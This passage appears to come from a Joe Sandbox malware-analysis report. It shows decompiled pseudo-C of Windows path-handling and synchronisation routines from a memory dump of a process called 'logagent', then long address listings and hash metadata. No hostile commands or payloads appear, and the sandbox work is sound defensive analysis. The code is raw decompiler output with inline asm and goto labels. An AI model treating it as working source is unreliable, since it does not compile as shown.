															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E051FF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E051B52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E051CEB70(1, 0x52a79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E051CAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E051F95D0();
																			L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E051FB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E051F3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E051FB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                              0x051d4128
                                              0x051d4135
                                              0x051d413c
                                              0x051d4141
                                              0x051d4145
                                              0x051d4147
                                              0x051d414e
                                              0x051d4151
                                              0x051d4159
                                              0x051d415c
                                              0x051d4160
                                              0x051d4164
                                              0x051d4168
                                              0x051d416c
                                              0x051d417f
                                              0x051d4181
                                              0x051d446a
                                              0x051d446a
                                              0x051d418c
                                              0x051d4195
                                              0x051d4199
                                              0x051d4432
                                              0x051d4439
                                              0x051d443d
                                              0x051d4442
                                              0x051d4447
                                              0x00000000
                                              0x051d419f
                                              0x051d41a3
                                              0x051d41b1
                                              0x051d41b9
                                              0x051d41bd
                                              0x051d45db
                                              0x051d45db
                                              0x00000000
                                              0x051d41c3
                                              0x051d41c3
                                              0x051d41ce
                                              0x051d41d4
                                              0x0521e138
                                              0x0521e13e
                                              0x0521e169
                                              0x0521e16d
                                              0x0521e19e
                                              0x0521e16f
                                              0x0521e16f
                                              0x0521e175
                                              0x0521e179
                                              0x0521e18f
                                              0x0521e193
                                              0x00000000
                                              0x0521e199
                                              0x00000000
                                              0x0521e199
                                              0x0521e193
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051d41da
                                              0x051d41da
                                              0x051d41df
                                              0x051d41e4
                                              0x051d41ec
                                              0x051d4203
                                              0x051d4207
                                              0x0521e1fd
                                              0x051d4222
                                              0x051d4226
                                              0x0521e1f3
                                              0x0521e1f3
                                              0x051d422c
                                              0x051d422c
                                              0x051d4233
                                              0x0521e1ed
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051d4239
                                              0x051d4239
                                              0x051d4239
                                              0x051d4239
                                              0x051d4233
                                              0x051d4226
                                              0x051d41ee
                                              0x051d41ee
                                              0x051d41f4
                                              0x051d4575
                                              0x0521e1b1
                                              0x0521e1b1
                                              0x00000000
                                              0x051d457b
                                              0x051d457b
                                              0x051d4582
                                              0x0521e1ab
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051d4588
                                              0x051d4588
                                              0x051d458c
                                              0x0521e1c4
                                              0x0521e1c4
                                              0x00000000
                                              0x051d4592
                                              0x051d4592
                                              0x051d4599
                                              0x0521e1be
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051d459f
                                              0x051d459f
                                              0x051d45a3
                                              0x0521e1d7
                                              0x0521e1e4
                                              0x00000000
                                              0x051d45a9
                                              0x051d45a9
                                              0x051d45b0
                                              0x0521e1d1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051d45b6
                                              0x051d45b6
                                              0x051d45b6
                                              0x00000000
                                              0x051d45b6
                                              0x051d45b0
                                              0x051d45a3
                                              0x051d4599
                                              0x051d458c
                                              0x051d4582
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051d41f4
                                              0x051d423e
                                              0x051d4241
                                              0x051d45c0
                                              0x051d45c4
                                              0x00000000
                                              0x051d45ca
                                              0x051d45ca
                                              0x00000000
                                              0x0521e207
                                              0x0521e20f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051d45d1
                                              0x00000000
                                              0x00000000
                                              0x051d45ca
                                              0x00000000
                                              0x051d4247
                                              0x051d4247
                                              0x051d4247
                                              0x051d4249
                                              0x051d4249
                                              0x051d4249
                                              0x051d4251
                                              0x051d4251
                                              0x051d4257
                                              0x051d425f
                                              0x051d426e
                                              0x051d4270
                                              0x051d427a
                                              0x0521e219
                                              0x0521e219
                                              0x051d4280
                                              0x051d4282
                                              0x051d4456
                                              0x051d45ea
                                              0x00000000
                                              0x051d45f0
                                              0x0521e223
                                              0x00000000
                                              0x0521e223
                                              0x051d445c
                                              0x051d445c
                                              0x00000000
                                              0x051d445c
                                              0x00000000
                                              0x051d4288
                                              0x051d428c
                                              0x0521e298
                                              0x051d4292
                                              0x051d4292
                                              0x051d429e
                                              0x051d42a3
                                              0x051d42a7
                                              0x051d42ac
                                              0x0521e22d
                                              0x051d42b2
                                              0x051d42b2
                                              0x051d42b9
                                              0x051d42bc
                                              0x051d42c2
                                              0x051d42ca
                                              0x051d42cd
                                              0x051d42cd
                                              0x051d42d4
                                              0x051d433f
                                              0x051d433f
                                              0x051d42d6
                                              0x051d42d6
                                              0x051d42d9
                                              0x051d42dd
                                              0x051d42eb
                                              0x0521e23a
                                              0x051d42f1
                                              0x051d4305
                                              0x051d430d
                                              0x051d4315
                                              0x051d4318
                                              0x051d431f
                                              0x051d4322
                                              0x051d432e
                                              0x051d433b
                                              0x051d433b
                                              0x00000000
                                              0x051d432e
                                              0x051d42eb
                                              0x051d434c
                                              0x051d434e
                                              0x051d4352
                                              0x051d4359
                                              0x051d435e
                                              0x051d4361
                                              0x051d436e
                                              0x051d438a
                                              0x051d438e
                                              0x051d4396
                                              0x051d439e
                                              0x051d43a1
                                              0x051d43ad
                                              0x051d43bb
                                              0x051d43bb
                                              0x051d43ad
                                              0x051d436e
                                              0x051d43bf
                                              0x051d43c5
                                              0x051d4463
                                              0x051d4463
                                              0x051d43ce
                                              0x051d43d5
                                              0x051d43d9
                                              0x051d43df
                                              0x051d4475
                                              0x051d4479
                                              0x051d4491
                                              0x051d4491
                                              0x051d4479
                                              0x051d43e5
                                              0x051d43eb
                                              0x051d43f4
                                              0x051d43f6
                                              0x051d43f9
                                              0x051d43fc
                                              0x051d43ff
                                              0x051d44e8
                                              0x051d44ed
                                              0x051d44f3
                                              0x0521e247
                                              0x00000000
                                              0x051d44f9
                                              0x051d4504
                                              0x051d4508
                                              0x051d450f
                                              0x0521e269
                                              0x00000000
                                              0x051d4515
                                              0x051d4519
                                              0x051d4531
                                              0x051d4534
                                              0x051d4537
                                              0x051d453e
                                              0x051d4541
                                              0x051d454a
                                              0x0521e255
                                              0x0521e255
                                              0x0521e25b
                                              0x0521e25e
                                              0x0521e261
                                              0x0521e261
                                              0x051d4555
                                              0x051d4559
                                              0x051d455d
                                              0x0521e26d
                                              0x0521e270
                                              0x0521e274
                                              0x0521e27a
                                              0x0521e27d
                                              0x0521e28e
                                              0x0521e28e
                                              0x051d4563
                                              0x051d4563
                                              0x051d4569
                                              0x051d4569
                                              0x00000000
                                              0x051d455d
                                              0x051d450f
                                              0x00000000
                                              0x051d44f3
                                              0x051d43ff
                                              0x051d4405
                                              0x051d4405
                                              0x051d4405
                                              0x051d42ac
                                              0x051d428c
                                              0x051d4282
                                              0x051d4407
                                              0x051d440d
                                              0x0521e2af
                                              0x0521e2af
                                              0x051d4413
                                              0x051d4413
                                              0x00000000
                                              0x051d41d4
                                              0x00000000
                                              0x051d41c3
                                              0x051d41bd
                                              0x051d4415
                                              0x051d4415
                                              0x051d4416
                                              0x051d4417
                                              0x051d4429
                                              0x051d416e
                                              0x051d416e
                                              0x051d4175
                                              0x051d4498
                                              0x051d449f
                                              0x0521e12d
                                              0x00000000
                                              0x0521e133
                                              0x00000000
                                              0x0521e133
                                              0x051d44a5
                                              0x051d44a5
                                              0x051d44aa
                                              0x00000000
                                              0x051d44bb
                                              0x051d44ca
                                              0x051d44d6
                                              0x051d44d7
                                              0x051d44d8
                                              0x051d44e3
                                              0x051d44e3
                                              0x051d44aa
                                              0x051d417b
                                              0x051d417b
                                              0x051d417b
                                              0x00000000
                                              0x051d417b
                                              0x051d4175
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 94f2a29cb24b76db1cad164b738de9ae0be37ff8fdf598647f44016153ba2355
                                              • Instruction ID: 812afd837e808298bbf610a47e4f846bebcb44a6a443657b63ef886149b8fc54
                                              • Opcode Fuzzy Hash: 94f2a29cb24b76db1cad164b738de9ae0be37ff8fdf598647f44016153ba2355
                                              • Instruction Fuzzy Hash: 9FF191706182118BCB24CF18C494A3BF7E6FF98754F05492EF88ACB250E7B4D885CB66
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E20A0 Relevance: .4, Instructions: 420COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E051E20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x52a8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E051E2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E051E2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E051B58EC(_t240);
									_t221 =  *0x52a5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x52a5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E051F4A2C(0x52a6e40, 0x51f4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E051D7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x5195c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E051EF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E051EF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E05237016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L051D2400(_t267 + 0x20);
															}
															L051D2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E051E2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E051D2280(_t134, 0x52a8608);
									__eflags =  *0x52a6e48 - _t253; // 0x345b508
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E051CFFB0(_t198, _t241, 0x52a8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x52a6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x52a8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E051E6B90(_t210,  &_v64);
										_t262 =  *0x52a8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E051EE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E051F97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E051F006A(0x52a8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x52a8608);
												E051FB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x52a6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x52a6e48; // 0x345b508
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E051CFFB0(_t198, _t240, 0x52a8608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E051F00C2(0x52a8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x4
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                              0x051e20a0
                                              0x051e20a8
                                              0x051e20ad
                                              0x051e20b3
                                              0x051e20b8
                                              0x051e20c2
                                              0x051e20c7
                                              0x051e20cb
                                              0x051e20d2
                                              0x051e2263
                                              0x051e2266
                                              0x05225836
                                              0x05225836
                                              0x00000000
                                              0x051e226c
                                              0x051e226c
                                              0x051e2270
                                              0x051e2274
                                              0x051e20e2
                                              0x051e20e2
                                              0x051e20e6
                                              0x051e20ee
                                              0x052257dc
                                              0x052257de
                                              0x052257ec
                                              0x052257ec
                                              0x052257f1
                                              0x052257f3
                                              0x052257f8
                                              0x00000000
                                              0x052257f8
                                              0x052257e0
                                              0x052257e4
                                              0x052257ea
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x052257ea
                                              0x051e20f4
                                              0x051e20f4
                                              0x051e20f8
                                              0x051e20f8
                                              0x051e20fc
                                              0x051e2100
                                              0x051e2106
                                              0x051e2201
                                              0x051e2206
                                              0x051e220b
                                              0x051e220e
                                              0x051e22a9
                                              0x051e22ac
                                              0x00000000
                                              0x00000000
                                              0x051e22b2
                                              0x051e22b5
                                              0x05225801
                                              0x05225806
                                              0x00000000
                                              0x00000000
                                              0x05225810
                                              0x05225815
                                              0x05225818
                                              0x00000000
                                              0x00000000
                                              0x0522581e
                                              0x051e22bb
                                              0x051e22bb
                                              0x051e2218
                                              0x051e2218
                                              0x051e221c
                                              0x051e2220
                                              0x051e2222
                                              0x051e22c2
                                              0x051e22c4
                                              0x051e22dc
                                              0x051e22dc
                                              0x051e22e1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051e22e7
                                              0x051e22c8
                                              0x051e22cd
                                              0x051e22d3
                                              0x051e22d6
                                              0x05225823
                                              0x05225825
                                              0x05225827
                                              0x00000000
                                              0x00000000
                                              0x0522582d
                                              0x00000000
                                              0x0522582d
                                              0x00000000
                                              0x051e2228
                                              0x051e2228
                                              0x00000000
                                              0x051e2228
                                              0x051e2222
                                              0x051e2214
                                              0x051e2214
                                              0x00000000
                                              0x051e2114
                                              0x051e2114
                                              0x051e2114
                                              0x051e211a
                                              0x051e211c
                                              0x051e2348
                                              0x051e234d
                                              0x05225840
                                              0x05225845
                                              0x05225848
                                              0x0522584e
                                              0x0522584e
                                              0x05225848
                                              0x051e2353
                                              0x051e2355
                                              0x051e2388
                                              0x051e2388
                                              0x051e2368
                                              0x051e236a
                                              0x051e236c
                                              0x051e238f
                                              0x00000000
                                              0x051e236e
                                              0x051e236e
                                              0x051e218e
                                              0x051e218e
                                              0x051e2191
                                              0x051e2195
                                              0x05225a03
                                              0x05225a06
                                              0x05225a0c
                                              0x05225a0f
                                              0x05225a11
                                              0x05225a13
                                              0x05225a13
                                              0x05225a19
                                              0x05225a1f
                                              0x00000000
                                              0x051e219b
                                              0x051e219b
                                              0x051e21a0
                                              0x051e2282
                                              0x051e2284
                                              0x051e2284
                                              0x051e2284
                                              0x051e2284
                                              0x051e21a6
                                              0x051e21a9
                                              0x051e21ac
                                              0x051e21ae
                                              0x051e21b3
                                              0x051e228b
                                              0x051e2290
                                              0x051e2379
                                              0x051e2296
                                              0x051e2298
                                              0x051e2298
                                              0x051e2290
                                              0x051e21b9
                                              0x051e21be
                                              0x051e22a2
                                              0x051e22a2
                                              0x051e21c4
                                              0x051e21c8
                                              0x051e21cc
                                              0x051e21d0
                                              0x051e21d4
                                              0x051e21de
                                              0x051e21e3
                                              0x05225a29
                                              0x05225a2c
                                              0x00000000
                                              0x00000000
                                              0x05225a3b
                                              0x00000000
                                              0x051e21e9
                                              0x051e21e9
                                              0x051e21e9
                                              0x051e21ee
                                              0x051e21f1
                                              0x05225a45
                                              0x05225a4b
                                              0x05225a52
                                              0x05225a58
                                              0x05225a5d
                                              0x05225a5f
                                              0x05225a71
                                              0x05225a61
                                              0x05225a6a
                                              0x05225a6a
                                              0x05225a76
                                              0x05225a79
                                              0x05225a7f
                                              0x05225a83
                                              0x05225a85
                                              0x05225a87
                                              0x05225a87
                                              0x05225a8c
                                              0x05225a91
                                              0x05225a97
                                              0x05225a9f
                                              0x05225aa0
                                              0x05225aa1
                                              0x05225aa6
                                              0x05225aab
                                              0x05225ab1
                                              0x05225ab3
                                              0x05225ab9
                                              0x05225aca
                                              0x05225ad4
                                              0x05225ad4
                                              0x05225ade
                                              0x05225ade
                                              0x05225aab
                                              0x05225a79
                                              0x05225a52
                                              0x051e21f7
                                              0x051e21f9
                                              0x051e21fe
                                              0x051e21fe
                                              0x051e21e3
                                              0x051e2195
                                              0x051e236c
                                              0x051e2122
                                              0x051e2122
                                              0x051e2124
                                              0x051e2231
                                              0x051e2236
                                              0x051e2236
                                              0x051e2238
                                              0x051e2238
                                              0x051e2240
                                              0x051e2242
                                              0x051e2244
                                              0x052259fc
                                              0x051e218c
                                              0x051e218c
                                              0x00000000
                                              0x051e218c
                                              0x051e224a
                                              0x051e224f
                                              0x051e2256
                                              0x051e2304
                                              0x051e2309
                                              0x051e230f
                                              0x051e231e
